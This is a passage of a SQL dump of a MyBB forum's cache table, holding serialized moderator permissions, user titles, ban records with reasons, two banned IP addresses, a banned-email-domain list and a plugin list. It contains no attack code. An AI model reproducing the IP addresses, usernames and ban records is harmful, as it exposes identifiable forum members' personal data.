"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:8:\"username\";s:19:\"R?????zo?\";s:9:\"usergroup\";s:1:\"9\";s:12:\"displaygroup\";s:2:\"13\";}}}i:66;a:1:{s:5:\"users\";a:1:{i:61;a:14:{s:3:\"mid\";s:2:\"10\";s:3:\"fid\";s:2:\"66\";s:2:\"id\";s:2:\"61\";s:7:\"isgroup\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:8:\"username\";s:3:\"NXK\";s:9:\"usergroup\";s:1:\"4\";s:12:\"displaygroup\";s:1:\"0\";}}}i:79;a:1:{s:5:\"users\";a:1:{i:232;a:14:{s:3:\"mid\";s:2:\"11\";s:3:\"fid\";s:2:\"79\";s:2:\"id\";s:3:\"232\";s:7:\"isgroup\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:8:\"username\";s:7:\"BreShiE\";s:9:\"usergroup\";s:1:\"2\";s:12:\"displaygroup\";s:2:\"12\";}}}i:81;a:1:{s:5:\"users\";a:1:{i:100;a:14:{s:3:\"mid\";s:2:\"14\";s:3:\"fid\";s:2:\"81\";s:2:\"id\";s:3:\"100\";s:7:\"isgroup\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:8:\"username\";s:23:\"??zg???g????61\";s:9:\"usergroup\";s:1:\"9\";s:12:\"displaygroup\";s:2:\"20\";}}}i:82;a:1:{s:5:\"users\";a:1:{i:228;a:14:{s:3:\"mid\";s:2:\"16\";s:3:\"fid\";s:2:\"82\";s:2:\"id\";s:3:\"228\";s:7:\"isgroup\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:8:\"username\";s:13:\"VirtualLegend\";s:9:\"usergroup\";s:1:\"6\";s:12:\"displaygroup\";s:1:\"6\";}}}i:70;s:0:\"\";i:71;s:0:\"\";i:72;s:0:\"\";i:76;s:0:\"\";i:77;s:0:\"\";i:73;s:0:\"\";i:74;s:0:\"\";i:75;s:0:\"\";i:32;s:0:\"\";i:33;s:0:\"\";i:34;s:0:\"\";i:63;s:0:\"\";i:44;s:0:\"\";i:35;s:0:\"\";i:36;s:0:\"\";i:37;s:0:\"\";i:38;s:0:\"\";i:39;s:0:\"\";i:40;s:0:\"\";i:41;s:0:\"\";}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('usertitles', 'a:7:{i:0;a:5:{s:4:\"utid\";s:1:\"7\";s:5:\"posts\";s:5:\"10000\";s:5:\"title\";s:5:\"Sigma\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:16:\"{theme}/star.gif\";}i:1;a:5:{s:4:\"utid\";s:1:\"6\";s:5:\"posts\";s:4:\"5000\";s:5:\"title\";s:4:\"Zeta\";s:5:\"stars\";s:1:\"6\";s:9:\"starimage\";s:16:\"{theme}/star.gif\";}i:2;a:5:{s:4:\"utid\";s:1:\"5\";s:5:\"posts\";s:4:\"2500\";s:5:\"title\";s:7:\"Epsilon\";s:5:\"stars\";s:1:\"5\";s:9:\"starimage\";s:0:\"\";}i:3;a:5:{s:4:\"utid\";s:1:\"4\";s:5:\"posts\";s:4:\"1000\";s:5:\"title\";s:5:\"Delta\";s:5:\"stars\";s:1:\"4\";s:9:\"starimage\";s:0:\"\";}i:4;a:5:{s:4:\"utid\";s:1:\"3\";s:5:\"posts\";s:3:\"250\";s:5:\"title\";s:5:\"Gamma\";s:5:\"stars\";s:1:\"3\";s:9:\"starimage\";s:0:\"\";}i:5;a:5:{s:4:\"utid\";s:1:\"2\";s:5:\"posts\";s:2:\"50\";s:5:\"title\";s:4:\"Beta\";s:5:\"stars\";s:1:\"2\";s:9:\"starimage\";s:0:\"\";}i:6;a:5:{s:4:\"utid\";s:1:\"1\";s:5:\"posts\";s:1:\"0\";s:5:\"title\";s:5:\"Alpha\";s:5:\"stars\";s:1:\"1\";s:9:\"starimage\";s:0:\"\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('reportedposts', 'a:3:{s:6:\"unread\";s:1:\"0\";s:5:\"total\";s:2:\"58\";s:12:\"lastdateline\";N;}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('mycode', 'a:1:{i:0;a:2:{s:5:\"regex\";s:28:\"\\[twitter\\](.*?)\\[/twitter\\]\";s:11:\"replacement\";s:350:\"Follow @$1 \";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('posticons', 'a:20:{i:1;a:3:{s:3:\"iid\";s:1:\"1\";s:4:\"name\";s:3:\"Bug\";s:4:\"path\";s:20:\"images/icons/bug.gif\";}i:2;a:3:{s:3:\"iid\";s:1:\"2\";s:4:\"name\";s:11:\"Exclamation\";s:4:\"path\";s:28:\"images/icons/exclamation.gif\";}i:3;a:3:{s:3:\"iid\";s:1:\"3\";s:4:\"name\";s:8:\"Question\";s:4:\"path\";s:25:\"images/icons/question.gif\";}i:4;a:3:{s:3:\"iid\";s:1:\"4\";s:4:\"name\";s:5:\"Smile\";s:4:\"path\";s:22:\"images/icons/smile.gif\";}i:5;a:3:{s:3:\"iid\";s:1:\"5\";s:4:\"name\";s:3:\"Sad\";s:4:\"path\";s:20:\"images/icons/sad.gif\";}i:6;a:3:{s:3:\"iid\";s:1:\"6\";s:4:\"name\";s:4:\"Wink\";s:4:\"path\";s:21:\"images/icons/wink.gif\";}i:7;a:3:{s:3:\"iid\";s:1:\"7\";s:4:\"name\";s:8:\"Big Grin\";s:4:\"path\";s:24:\"images/icons/biggrin.gif\";}i:8;a:3:{s:3:\"iid\";s:1:\"8\";s:4:\"name\";s:6:\"Tongue\";s:4:\"path\";s:23:\"images/icons/tongue.gif\";}i:9;a:3:{s:3:\"iid\";s:1:\"9\";s:4:\"name\";s:5:\"Brick\";s:4:\"path\";s:22:\"images/icons/brick.gif\";}i:10;a:3:{s:3:\"iid\";s:2:\"10\";s:4:\"name\";s:5:\"Heart\";s:4:\"path\";s:22:\"images/icons/heart.gif\";}i:11;a:3:{s:3:\"iid\";s:2:\"11\";s:4:\"name\";s:11:\"Information\";s:4:\"path\";s:28:\"images/icons/information.gif\";}i:12;a:3:{s:3:\"iid\";s:2:\"12\";s:4:\"name\";s:9:\"Lightbulb\";s:4:\"path\";s:26:\"images/icons/lightbulb.gif\";}i:13;a:3:{s:3:\"iid\";s:2:\"13\";s:4:\"name\";s:5:\"Music\";s:4:\"path\";s:22:\"images/icons/music.gif\";}i:14;a:3:{s:3:\"iid\";s:2:\"14\";s:4:\"name\";s:5:\"Photo\";s:4:\"path\";s:22:\"images/icons/photo.gif\";}i:15;a:3:{s:3:\"iid\";s:2:\"15\";s:4:\"name\";s:7:\"Rainbow\";s:4:\"path\";s:24:\"images/icons/rainbow.gif\";}i:16;a:3:{s:3:\"iid\";s:2:\"16\";s:4:\"name\";s:7:\"Shocked\";s:4:\"path\";s:24:\"images/icons/shocked.gif\";}i:17;a:3:{s:3:\"iid\";s:2:\"17\";s:4:\"name\";s:4:\"Star\";s:4:\"path\";s:21:\"images/icons/star.gif\";}i:18;a:3:{s:3:\"iid\";s:2:\"18\";s:4:\"name\";s:11:\"Thumbs Down\";s:4:\"path\";s:27:\"images/icons/thumbsdown.gif\";}i:19;a:3:{s:3:\"iid\";s:2:\"19\";s:4:\"name\";s:9:\"Thumbs Up\";s:4:\"path\";s:25:\"images/icons/thumbsup.gif\";}i:20;a:3:{s:3:\"iid\";s:2:\"20\";s:4:\"name\";s:5:\"Video\";s:4:\"path\";s:22:\"images/icons/video.gif\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('update_check', 'a:1:{s:10:\"last_check\";i:1352785420;}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('tasks', 'a:1:{s:7:\"nextrun\";s:10:\"1352823660\";}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('spiders', 'a:8:{i:16;a:4:{s:3:\"sid\";s:2:\"16\";s:4:\"name\";s:12:\"Google-Image\";s:9:\"useragent\";s:15:\"Googlebot-Image\";s:9:\"usergroup\";s:1:\"8\";}i:96;a:4:{s:3:\"sid\";s:2:\"96\";s:4:\"name\";s:12:\"Web Archive \";s:9:\"useragent\";s:15:\"archive.org_bot\";s:9:\"usergroup\";s:1:\"8\";}i:9;a:4:{s:3:\"sid\";s:1:\"9\";s:4:\"name\";s:5:\"Baidu\";s:9:\"useragent\";s:11:\"Baiduspider\";s:9:\"usergroup\";s:1:\"8\";}i:93;a:4:{s:3:\"sid\";s:2:\"93\";s:4:\"name\";s:11:\"DuckDuckBot\";s:9:\"useragent\";s:11:\"DuckDuckBot\";s:9:\"usergroup\";s:1:\"8\";}i:18;a:4:{s:3:\"sid\";s:2:\"18\";s:4:\"name\";s:14:\"Alexa Internet\";s:9:\"useragent\";s:11:\"ia_archiver\";s:9:\"usergroup\";s:1:\"8\";}i:1;a:4:{s:3:\"sid\";s:1:\"1\";s:4:\"name\";s:6:\"Google\";s:9:\"useragent\";s:9:\"Googlebot\";s:9:\"usergroup\";s:1:\"8\";}i:7;a:4:{s:3:\"sid\";s:1:\"7\";s:4:\"name\";s:4:\"Bing\";s:9:\"useragent\";s:6:\"msnbot\";s:9:\"usergroup\";s:1:\"8\";}i:8;a:4:{s:3:\"sid\";s:1:\"8\";s:4:\"name\";s:6:\"Yahoo!\";s:9:\"useragent\";s:5:\"Slurp\";s:9:\"usergroup\";s:1:\"8\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('bannedips', 'a:2:{i:82;a:2:{s:3:\"fid\";s:2:\"82\";s:6:\"filter\";s:13:\"97.255.20.208\";}i:88;a:2:{s:3:\"fid\";s:2:\"88\";s:6:\"filter\";s:12:\"71.67.179.16\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('banned', 'a:17:{i:108;a:10:{s:3:\"uid\";s:3:\"108\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1346768917\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:53:\"Multi Accounting (Proof: Time and gmx.com spam email)\";}i:157;a:10:{s:3:\"uid\";s:3:\"157\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1346769145\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:7:\"Spammer\";}i:176;a:10:{s:3:\"uid\";s:3:\"176\";s:3:\"gid\";s:1:\"0\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1346968852\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:12:\"Fake E-Mails\";}i:177;a:10:{s:3:\"uid\";s:3:\"177\";s:3:\"gid\";s:1:\"0\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1346968852\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:12:\"Fake E-Mails\";}i:179;a:10:{s:3:\"uid\";s:3:\"179\";s:3:\"gid\";s:1:\"0\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1347077544\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:10:\"Spam Email\";}i:211;a:10:{s:3:\"uid\";s:3:\"211\";s:3:\"gid\";s:1:\"0\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1349496249\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:29:\"20 Minute Mail? Good Bye Spam\";}i:231;a:10:{s:3:\"uid\";s:3:\"231\";s:3:\"gid\";s:1:\"7\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1350428750\";s:7:\"bantime\";s:5:\"0-2-0\";s:6:\"lifted\";s:10:\"1355007900\";s:6:\"reason\";s:46:\"Take a look here: http://pastebin.com/sftb2X5x\";}i:243;a:10:{s:3:\"uid\";s:3:\"243\";s:3:\"gid\";s:1:\"7\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1349734513\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:9:\"gujvgrrgt\";}i:203;a:10:{s:3:\"uid\";s:3:\"203\";s:3:\"gid\";s:1:\"7\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:11:\"18,17,20,13\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:2:\"61\";s:8:\"dateline\";s:10:\"1349924553\";s:7:\"bantime\";s:5:\"0-0-1\";s:6:\"lifted\";s:10:\"1381460520\";s:6:\"reason\";s:28:\"Threatning to DDoS our site.\";}i:249;a:10:{s:3:\"uid\";s:3:\"249\";s:3:\"gid\";s:1:\"7\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1350093593\";s:7:\"bantime\";s:5:\"0-2-0\";s:6:\"lifted\";s:10:\"1355367540\";s:6:\"reason\";s:52:\"Kicked out of AF but still active on AF? Very legit.\";}i:254;a:10:{s:3:\"uid\";s:3:\"254\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"9\";s:19:\"oldadditionalgroups\";s:2:\"17\";s:15:\"olddisplaygroup\";s:2:\"17\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1351630198\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:25:\"Scammers are not welcome.\";}i:266;a:10:{s:3:\"uid\";s:3:\"266\";s:3:\"gid\";s:1:\"7\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1350450377\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:128:\"Oh Off course you can talk to my staff by taking their Skype IDs and not PMing them also offering them to leave LH and go on AF.\";}i:251;a:10:{s:3:\"uid\";s:3:\"251\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1350525399\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:60:\"Sorry but you are not welcome to LH due to security reasons.\";}i:224;a:10:{s:3:\"uid\";s:3:\"224\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1350760616\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:26:\"Thanks for the offer. Bye.\";}i:214;a:10:{s:3:\"uid\";s:3:\"214\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:2:\"17\";s:15:\"olddisplaygroup\";s:1:\"2\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1351038873\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:9:\"Leeching.\";}i:302;a:10:{s:3:\"uid\";s:3:\"302\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1352253808\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:40:\"Leechers not allowed + Multi Accounting \";}i:328;a:10:{s:3:\"uid\";s:3:\"328\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"2\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1352258991\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:35:\"Multi Accounting. Do not come back!\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('bannedemails', 'a:65:{i:28;a:2:{s:3:\"fid\";s:2:\"28\";s:6:\"filter\";s:15:\"*hackforums.net\";}i:5;a:2:{s:3:\"fid\";s:1:\"5\";s:6:\"filter\";s:8:\"*fbi.gov\";}i:29;a:2:{s:3:\"fid\";s:2:\"29\";s:6:\"filter\";s:12:\"*teleworm.us\";}i:9;a:2:{s:3:\"fid\";s:1:\"9\";s:6:\"filter\";s:4:\"*.ru\";}i:10;a:2:{s:3:\"fid\";s:2:\"10\";s:6:\"filter\";s:10:\"*myway.com\";}i:11;a:2:{s:3:\"fid\";s:2:\"11\";s:6:\"filter\";s:16:\"*mailinator2.com\";}i:12;a:2:{s:3:\"fid\";s:2:\"12\";s:6:\"filter\";s:14:\"*sogetthis.com\";}i:13;a:2:{s:3:\"fid\";s:2:\"13\";s:6:\"filter\";s:15:\"*mailinator.net\";}i:16;a:2:{s:3:\"fid\";s:2:\"16\";s:6:\"filter\";s:17:\"*spamherelots.com\";}i:15;a:2:{s:3:\"fid\";s:2:\"15\";s:6:\"filter\";s:25:\"*thisisnotmyrealemail.com\";}i:17;a:2:{s:3:\"fid\";s:2:\"17\";s:6:\"filter\";s:11:\"*spambox.us\";}i:18;a:2:{s:3:\"fid\";s:2:\"18\";s:6:\"filter\";s:13:\"*NoSpamfor.Us\";}i:19;a:2:{s:3:\"fid\";s:2:\"19\";s:6:\"filter\";s:23:\"*guerrillamailblock.com\";}i:20;a:2:{s:3:\"fid\";s:2:\"20\";s:6:\"filter\";s:12:\"*jetable.com\";}i:21;a:2:{s:3:\"fid\";s:2:\"21\";s:6:\"filter\";s:12:\"*hotmial.com\";}i:22;a:2:{s:3:\"fid\";s:2:\"22\";s:6:\"filter\";s:11:\"*hotmai.com\";}i:23;a:2:{s:3:\"fid\";s:2:\"23\";s:6:\"filter\";s:14:\"*mintemail.com\";}i:24;a:2:{s:3:\"fid\";s:2:\"24\";s:6:\"filter\";s:13:\"*meltmail.com\";}i:25;a:2:{s:3:\"fid\";s:2:\"25\";s:6:\"filter\";s:9:\"*sify.com\";}i:26;a:2:{s:3:\"fid\";s:2:\"26\";s:6:\"filter\";s:13:\"*binkmail.com\";}i:27;a:2:{s:3:\"fid\";s:2:\"27\";s:6:\"filter\";s:16:\"*spamgourmet.com\";}i:30;a:2:{s:3:\"fid\";s:2:\"30\";s:6:\"filter\";s:15:\"*rediffmail.com\";}i:31;a:2:{s:3:\"fid\";s:2:\"31\";s:6:\"filter\";s:11:\"*spamfree24\";}i:32;a:2:{s:3:\"fid\";s:2:\"32\";s:6:\"filter\";s:12:\"*jetable.org\";}i:33;a:2:{s:3:\"fid\";s:2:\"33\";s:6:\"filter\";s:14:\"*tempinbox.com\";}i:34;a:2:{s:3:\"fid\";s:2:\"34\";s:6:\"filter\";s:15:\"*mailexpire.com\";}i:35;a:2:{s:3:\"fid\";s:2:\"35\";s:6:\"filter\";s:12:\"*yopmail.com\";}i:36;a:2:{s:3:\"fid\";s:2:\"36\";s:6:\"filter\";s:12:\"*bofthew.com\";}i:37;a:2:{s:3:\"fid\";s:2:\"37\";s:6:\"filter\";s:14:\"*safe-mail.net\";}i:38;a:2:{s:3:\"fid\";s:2:\"38\";s:6:\"filter\";s:15:\"*trash-mail.com\";}i:39;a:2:{s:3:\"fid\";s:2:\"39\";s:6:\"filter\";s:8:\"*spam.la\";}i:40;a:2:{s:3:\"fid\";s:2:\"40\";s:6:\"filter\";s:14:\"*mailcatch.com\";}i:41;a:2:{s:3:\"fid\";s:2:\"41\";s:6:\"filter\";s:14:\"*goemailgo.com\";}i:42;a:2:{s:3:\"fid\";s:2:\"42\";s:6:\"filter\";s:17:\"*thankyou2010.com\";}i:43;a:2:{s:3:\"fid\";s:2:\"43\";s:6:\"filter\";s:13:\"*emailthe.net\";}i:44;a:2:{s:3:\"fid\";s:2:\"44\";s:6:\"filter\";s:9:\"*gmil.com\";}i:45;a:2:{s:3:\"fid\";s:2:\"45\";s:6:\"filter\";s:16:\"*dispostable.com\";}i:46;a:2:{s:3:\"fid\";s:2:\"46\";s:6:\"filter\";s:14:\"*anonymbox.com\";}i:47;a:2:{s:3:\"fid\";s:2:\"47\";s:6:\"filter\";s:10:\"*lhsdv.com\";}i:48;a:2:{s:3:\"fid\";s:2:\"48\";s:6:\"filter\";s:10:\"*gamil.com\";}i:49;a:2:{s:3:\"fid\";s:2:\"49\";s:6:\"filter\";s:11:\"*0-mail.com\";}i:50;a:2:{s:3:\"fid\";s:2:\"50\";s:6:\"filter\";s:19:\"*makemetheking.com \";}i:51;a:2:{s:3:\"fid\";s:2:\"51\";s:6:\"filter\";s:14:\"*djrabbit.info\";}i:52;a:2:{s:3:\"fid\";s:2:\"52\";s:6:\"filter\";s:15:\"*quickinbox.com\";}i:53;a:2:{s:3:\"fid\";s:2:\"53\";s:6:\"filter\";s:15:\"*zippymail.info\";}i:54;a:2:{s:3:\"fid\";s:2:\"54\";s:6:\"filter\";s:15:\"*mailinator.com\";}i:55;a:2:{s:3:\"fid\";s:2:\"55\";s:6:\"filter\";s:19:\"*emeraldwebmail.com\";}i:56;a:2:{s:3:\"fid\";s:2:\"56\";s:6:\"filter\";s:13:\"*bobmail.info\";}i:57;a:2:{s:3:\"fid\";s:2:\"57\";s:6:\"filter\";s:14:\"*suremail.info\";}i:58;a:2:{s:3:\"fid\";s:2:\"58\";s:6:\"filter\";s:10:\"*pjjkp.com\";}i:59;a:2:{s:3:\"fid\";s:2:\"59\";s:6:\"filter\";s:8:\"*163.com\";}i:60;a:2:{s:3:\"fid\";s:2:\"60\";s:6:\"filter\";s:16:\"*tradermail.info\";}i:61;a:2:{s:3:\"fid\";s:2:\"61\";s:6:\"filter\";s:8:\"*hush.ai\";}i:62;a:2:{s:3:\"fid\";s:2:\"62\";s:6:\"filter\";s:18:\"*incognitomail.org\";}i:63;a:2:{s:3:\"fid\";s:2:\"63\";s:6:\"filter\";s:16:\"*wegwerfemail.de\";}i:64;a:2:{s:3:\"fid\";s:2:\"64\";s:6:\"filter\";s:16:\"*safetymail.info\";}i:65;a:2:{s:3:\"fid\";s:2:\"65\";s:6:\"filter\";s:15:\"*keepmymail.com\";}i:66;a:2:{s:3:\"fid\";s:2:\"66\";s:6:\"filter\";s:10:\"*jnxjn.com\";}i:67;a:2:{s:3:\"fid\";s:2:\"67\";s:6:\"filter\";s:16:\"*appspotmail.com\";}i:69;a:2:{s:3:\"fid\";s:2:\"69\";s:6:\"filter\";s:6:\"*o2.pl\";}i:73;a:2:{s:3:\"fid\";s:2:\"73\";s:6:\"filter\";s:5:\"*.edu\";}i:74;a:2:{s:3:\"fid\";s:2:\"74\";s:6:\"filter\";s:6:\"*dumps\";}i:75;a:2:{s:3:\"fid\";s:2:\"75\";s:6:\"filter\";s:8:\"*gmx.com\";}i:83;a:2:{s:3:\"fid\";s:2:\"83\";s:6:\"filter\";s:12:\"*speed.1s.fr\";}i:87;a:2:{s:3:\"fid\";s:2:\"87\";s:6:\"filter\";s:15:\"*rocketmail.com\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('birthdays', 'a:0:{}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('groupleaders', 'a:5:{i:232;a:1:{i:0;a:5:{s:3:\"lid\";s:1:\"5\";s:3:\"gid\";s:2:\"12\";s:3:\"uid\";s:3:\"232\";s:16:\"canmanagemembers\";s:1:\"1\";s:17:\"canmanagerequests\";s:1:\"1\";}}i:62;a:1:{i:0;a:5:{s:3:\"lid\";s:1:\"7\";s:3:\"gid\";s:2:\"13\";s:3:\"uid\";s:2:\"62\";s:16:\"canmanagemembers\";s:1:\"1\";s:17:\"canmanagerequests\";s:1:\"1\";}}i:61;a:1:{i:0;a:5:{s:3:\"lid\";s:1:\"4\";s:3:\"gid\";s:2:\"17\";s:3:\"uid\";s:2:\"61\";s:16:\"canmanagemembers\";s:1:\"1\";s:17:\"canmanagerequests\";s:1:\"1\";}}i:100;a:1:{i:0;a:5:{s:3:\"lid\";s:2:\"10\";s:3:\"gid\";s:2:\"20\";s:3:\"uid\";s:3:\"100\";s:16:\"canmanagemembers\";s:1:\"1\";s:17:\"canmanagerequests\";s:1:\"1\";}}i:228;a:1:{i:0;a:5:{s:3:\"lid\";s:2:\"11\";s:3:\"gid\";s:2:\"21\";s:3:\"uid\";s:3:\"228\";s:16:\"canmanagemembers\";s:1:\"1\";s:17:\"canmanagerequests\";s:1:\"1\";}}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('threadprefixes', 'a:0:{}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('forumsdisplay', 'a:1:{i:-1;a:1:{s:8:\"modtools\";i:1;}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('plugins', 'a:1:{s:6:\"active\";a:49:{s:7:\"contact\";s:7:\"contact\";s:8:\"hotwords\";s:8:\"hotwords\";s:9:\"modreplog\";s:9:\"modreplog\";s:7:\"hellban\";s:7:\"hellban\";s:9:\"welcomepm\";s:9:\"welcomepm\";s:5:\"mceap\";s:5:\"mceap\";s:6:\"ip_man\";s:6:\"ip_man\";s:12:\"donationpage\";s:12:\"donationpage\";s:13:\"prune_members\";s:13:\"prune_members\";s:7:\"spoiler\";s:7:\"spoiler\";s:7:\"pmadmin\";s:7:\"pmadmin\";s:14:\"privatewarning\";s:14:\"privatewarning\";s:9:\"admhijack\";s:9:\"admhijack\";s:4:\"gcvt\";s:4:\"gcvt\";s:13:\"mypermissions\";s:13:\"mypermissions\";s:9:\"modNotify\";s:9:\"modNotify\";s:6:\"fassim\";s:6:\"fassim\";s:18:\"ForumsRequirements\";s:18:\"ForumsRequirements\";s:14:\"strictUsername\";s:14:\"strictUsername\";s:8:\"tab_menu\";s:8:\"tab_menu\";s:6:\"ficons\";s:6:\"ficons\";s:7:\"myflood\";s:7:\"myflood\";s:13:\"my_ad_manager\";s:13:\"my_ad_manager\";s:12:\"my_meta_tags\";s:12:\"my_meta_tags\";s:7:\"deny_ip\";s:7:\"deny_ip\";s:10:\"sticky_man\";s:10:\"sticky_man\";s:11:\"ad_in_close\";s:11:\"ad_in_close\";s:16:\"moderation_posts\";s:16:\"moderation_posts\";s:9:\"mods_page\";s:9:\"mods_page\";s:10:\"self_close\";s:10:\"self_close\";s:13:\"profilegroups\";s:13:\"profilegroups\";s:13:\"repeat_report\";s:13:\"repeat_report\";s:6:\"repoco\";s:6:\"repoco\";s:6:\"addbot\";s:6:\"addbot\";s:13:\"monthly_stats\";s:13:\"monthly_stats\";s:9:\"editperms\";s:9:\"editperms\";s:11:\"block_proxy\";s:11:\"block_proxy\";s:14:\"goodbyespammer\";s:14:\"goodbyespammer\";s:9:\"easyrefer\";s:9:\"easyrefer\";s:3:\"amp\";s:3:\"amp\";s: